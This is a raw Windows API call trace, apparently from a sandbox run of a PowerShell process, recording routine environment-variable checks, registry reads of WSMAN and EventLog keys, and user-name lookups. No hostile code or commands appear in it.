	[0446.042] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.042] CoTaskMemFree (pv=0x2eadc0) 
	[0446.044] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0446.044] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.044] CoTaskMemFree (pv=0x2eadc0) 
	[0446.046] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0446.047] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.047] CoTaskMemFree (pv=0x2eadc0) 
	[0446.047] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0446.047] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.047] CoTaskMemFree (pv=0x2eadc0) 
	[0446.048] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0446.048] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.048] CoTaskMemFree (pv=0x2eadc0) 
	[0446.052] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d578 | out: phkResult=0x12d578*=0x2fc) returned 0x0
	[0446.053] RegQueryInfoKeyW (in: hKey=0x2fc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d47c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d478, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d47c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d478*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.054] CoTaskMemFree (pv=0x0) 
	[0446.054] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.054] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x0, lpValueName=0x334800, lpcchValueName=0x12d528, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12d528, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0446.055] CoTaskMemFree (pv=0x334800) 
	[0446.055] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.055] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x1, lpValueName=0x334800, lpcchValueName=0x12d528, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12d528, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0446.055] CoTaskMemFree (pv=0x334800) 
	[0446.055] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.055] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x2, lpValueName=0x334800, lpcchValueName=0x12d528, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x12d528, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0446.055] CoTaskMemFree (pv=0x334800) 
	[0446.056] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d50c, lpData=0x0, lpcbData=0x12d508*=0x0 | out: lpType=0x12d50c*=0x1, lpData=0x0, lpcbData=0x12d508*=0x8) returned 0x0
	[0446.056] CoTaskMemAlloc (cb=0xc) returned 0x3a9700
	[0446.056] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d4dc, lpData=0x3a9700, lpcbData=0x12d4d8*=0x8 | out: lpType=0x12d4dc*=0x1, lpData="2.0", lpcbData=0x12d4d8*=0x8) returned 0x0
	[0446.056] CoTaskMemFree (pv=0x3a9700) 
	[0446.110] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4c8 | out: phkResult=0x12d4c8*=0x300) returned 0x0
	[0446.110] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d3cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d3c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d3cc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d3c8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.110] CoTaskMemFree (pv=0x0) 
	[0446.111] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.111] RegEnumValueW (in: hKey=0x300, dwIndex=0x0, lpValueName=0x334800, lpcchValueName=0x12d478, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12d478, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0446.111] CoTaskMemFree (pv=0x334800) 
	[0446.111] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.111] RegEnumValueW (in: hKey=0x300, dwIndex=0x1, lpValueName=0x334800, lpcchValueName=0x12d478, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12d478, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0446.111] CoTaskMemFree (pv=0x334800) 
	[0446.111] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.111] RegEnumValueW (in: hKey=0x300, dwIndex=0x2, lpValueName=0x334800, lpcchValueName=0x12d478, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x12d478, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0446.111] CoTaskMemFree (pv=0x334800) 
	[0446.111] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d45c, lpData=0x0, lpcbData=0x12d458*=0x0 | out: lpType=0x12d45c*=0x1, lpData=0x0, lpcbData=0x12d458*=0x8) returned 0x0
	[0446.111] CoTaskMemAlloc (cb=0xc) returned 0x3a9520
	[0446.111] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d42c, lpData=0x3a9520, lpcbData=0x12d428*=0x8 | out: lpType=0x12d42c*=0x1, lpData="2.0", lpcbData=0x12d428*=0x8) returned 0x0
	[0446.111] CoTaskMemFree (pv=0x3a9520) 
	[0446.112] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0446.112] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.113] CoTaskMemFree (pv=0x2eadc0) 
	[0446.117] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0446.117] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.118] CoTaskMemFree (pv=0x2eadc0) 
	[0446.123] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4f8 | out: phkResult=0x12d4f8*=0x304) returned 0x0
	[0446.127] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d46c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d468, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d46c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d468*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.127] CoTaskMemFree (pv=0x0) 
	[0446.128] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.128] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x0, lpName=0x334800, lpcchName=0x12d4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.128] CoTaskMemFree (pv=0x334800) 
	[0446.128] CoTaskMemFree (pv=0x0) 
	[0446.128] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.128] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x1, lpName=0x334800, lpcchName=0x12d4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.128] CoTaskMemFree (pv=0x334800) 
	[0446.128] CoTaskMemFree (pv=0x0) 
	[0446.128] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.128] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x2, lpName=0x334800, lpcchName=0x12d4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.129] CoTaskMemFree (pv=0x334800) 
	[0446.129] CoTaskMemFree (pv=0x0) 
	[0446.129] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.129] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x3, lpName=0x334800, lpcchName=0x12d4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.129] CoTaskMemFree (pv=0x334800) 
	[0446.129] CoTaskMemFree (pv=0x0) 
	[0446.129] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.129] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x4, lpName=0x334800, lpcchName=0x12d4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.129] CoTaskMemFree (pv=0x334800) 
	[0446.129] CoTaskMemFree (pv=0x0) 
	[0446.129] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.129] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x5, lpName=0x334800, lpcchName=0x12d4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.129] CoTaskMemFree (pv=0x334800) 
	[0446.129] CoTaskMemFree (pv=0x0) 
	[0446.129] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.129] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x6, lpName=0x334800, lpcchName=0x12d4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.129] CoTaskMemFree (pv=0x334800) 
	[0446.129] CoTaskMemFree (pv=0x0) 
	[0446.129] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.129] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x7, lpName=0x334800, lpcchName=0x12d4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.129] CoTaskMemFree (pv=0x334800) 
	[0446.129] CoTaskMemFree (pv=0x0) 
	[0446.129] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.129] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x8, lpName=0x334800, lpcchName=0x12d4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.130] CoTaskMemFree (pv=0x334800) 
	[0446.130] CoTaskMemFree (pv=0x0) 
	[0446.130] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d558 | out: phkResult=0x12d558*=0x1c0) returned 0x0
	[0446.130] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d558 | out: phkResult=0x12d558*=0x0) returned 0x2
	[0446.130] RegOpenKeyExW (in: hKey=0x304, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d558 | out: phkResult=0x12d558*=0x32c) returned 0x0
	[0446.130] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d558 | out: phkResult=0x12d558*=0x0) returned 0x2
	[0446.130] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d558 | out: phkResult=0x12d558*=0x330) returned 0x0
	[0446.130] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d558 | out: phkResult=0x12d558*=0x0) returned 0x2
	[0446.130] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d558 | out: phkResult=0x12d558*=0x334) returned 0x0
	[0446.130] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d558 | out: phkResult=0x12d558*=0x0) returned 0x2
	[0446.130] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d558 | out: phkResult=0x12d558*=0x338) returned 0x0
	[0446.131] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d558 | out: phkResult=0x12d558*=0x0) returned 0x2
	[0446.131] RegOpenKeyExW (in: hKey=0x304, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d558 | out: phkResult=0x12d558*=0x33c) returned 0x0
	[0446.131] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d558 | out: phkResult=0x12d558*=0x0) returned 0x2
	[0446.131] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d558 | out: phkResult=0x12d558*=0x340) returned 0x0
	[0446.131] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d558 | out: phkResult=0x12d558*=0x0) returned 0x2
	[0446.131] RegOpenKeyExW (in: hKey=0x304, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d558 | out: phkResult=0x12d558*=0x344) returned 0x0
	[0446.131] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d558 | out: phkResult=0x12d558*=0x0) returned 0x2
	[0446.131] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d558 | out: phkResult=0x12d558*=0x348) returned 0x0
	[0446.131] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d558 | out: phkResult=0x12d558*=0x34c) returned 0x0
	[0446.131] RegCloseKey (hKey=0x34c) returned 0x0
	[0446.132] RegCloseKey (hKey=0x304) returned 0x0
	[0446.136] RegCloseKey (hKey=0x348) returned 0x0
	[0446.152] CoTaskMemAlloc (cb=0x804) returned 0x31dfb0
	[0446.152] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x31dfb0, nSize=0x12d768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d768) returned 0x1
	[0446.153] CoTaskMemFree (pv=0x31dfb0) 
	[0446.155] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.155] GetUserNameW (in: lpBuffer=0x334800, pcbBuffer=0x12d7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d7a8) returned 1
	[0446.155] CoTaskMemFree (pv=0x334800) 
	[0446.213] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4a8 | out: phkResult=0x12d4a8*=0x350) returned 0x0
	[0446.213] RegQueryInfoKeyW (in: hKey=0x350, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d41c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d418, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d41c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d418*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.213] CoTaskMemFree (pv=0x0) 
	[0446.213] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.214] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x0, lpName=0x334800, lpcchName=0x12d4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.214] CoTaskMemFree (pv=0x334800) 
	[0446.214] CoTaskMemFree (pv=0x0) 
	[0446.214] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.214] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x1, lpName=0x334800, lpcchName=0x12d4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.214] CoTaskMemFree (pv=0x334800) 
	[0446.214] CoTaskMemFree (pv=0x0) 
	[0446.214] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.214] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x2, lpName=0x334800, lpcchName=0x12d4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.214] CoTaskMemFree (pv=0x334800) 
	[0446.214] CoTaskMemFree (pv=0x0) 
	[0446.214] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.214] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x3, lpName=0x334800, lpcchName=0x12d4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.214] CoTaskMemFree (pv=0x334800) 
	[0446.214] CoTaskMemFree (pv=0x0) 
	[0446.214] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.214] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x4, lpName=0x334800, lpcchName=0x12d4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.214] CoTaskMemFree (pv=0x334800) 
	[0446.214] CoTaskMemFree (pv=0x0) 
	[0446.214] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.214] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x5, lpName=0x334800, lpcchName=0x12d4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.214] CoTaskMemFree (pv=0x334800) 
	[0446.214] CoTaskMemFree (pv=0x0) 
	[0446.214] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.214] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x6, lpName=0x334800, lpcchName=0x12d4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.214] CoTaskMemFree (pv=0x334800) 
	[0446.214] CoTaskMemFree (pv=0x0) 
	[0446.214] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.214] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x7, lpName=0x334800, lpcchName=0x12d4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.215] CoTaskMemFree (pv=0x334800) 
	[0446.215] CoTaskMemFree (pv=0x0) 
	[0446.215] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.215] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x8, lpName=0x334800, lpcchName=0x12d4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.215] CoTaskMemFree (pv=0x334800) 
	[0446.215] CoTaskMemFree (pv=0x0) 
	[0446.215] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x354) returned 0x0
	[0446.215] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x0) returned 0x2
	[0446.215] RegOpenKeyExW (in: hKey=0x350, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x358) returned 0x0
	[0446.215] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x0) returned 0x2
	[0446.215] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x35c) returned 0x0
	[0446.215] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x0) returned 0x2
	[0446.215] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x360) returned 0x0
	[0446.216] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x0) returned 0x2
	[0446.216] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x364) returned 0x0
	[0446.216] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x0) returned 0x2
	[0446.216] RegOpenKeyExW (in: hKey=0x350, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x368) returned 0x0
	[0446.216] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x0) returned 0x2
	[0446.216] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x36c) returned 0x0
	[0446.216] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x0) returned 0x2
	[0446.216] RegOpenKeyExW (in: hKey=0x350, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x370) returned 0x0
	[0446.216] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x0) returned 0x2
	[0446.216] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x374) returned 0x0
	[0446.217] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d508 | out: phkResult=0x12d508*=0x378) returned 0x0
	[0446.217] RegCloseKey (hKey=0x378) returned 0x0
	[0446.217] RegCloseKey (hKey=0x350) returned 0x0
	[0446.217] RegCloseKey (hKey=0x374) returned 0x0
	[0446.218] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4a8 | out: phkResult=0x12d4a8*=0x374) returned 0x0
	[0446.218] RegQueryInfoKeyW (in: hKey=0x374, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d41c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d418, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d41c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d418*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.218] CoTaskMemFree (pv=0x0) 
	[0446.218] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.218] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x0, lpName=0x334800, lpcchName=0x12d4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.219] CoTaskMemFree (pv=0x334800) 
	[0446.219] CoTaskMemFree (pv=0x0) 
	[0446.219] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.219] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x1, lpName=0x334800, lpcchName=0x12d4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0446.219] CoTaskMemFree (pv=0x334800) 
	[0446.219] CoTaskMemFree (pv=0x0) 
	[0446.219] CoTaskMemAlloc (cb=0x204) returned 0x334800
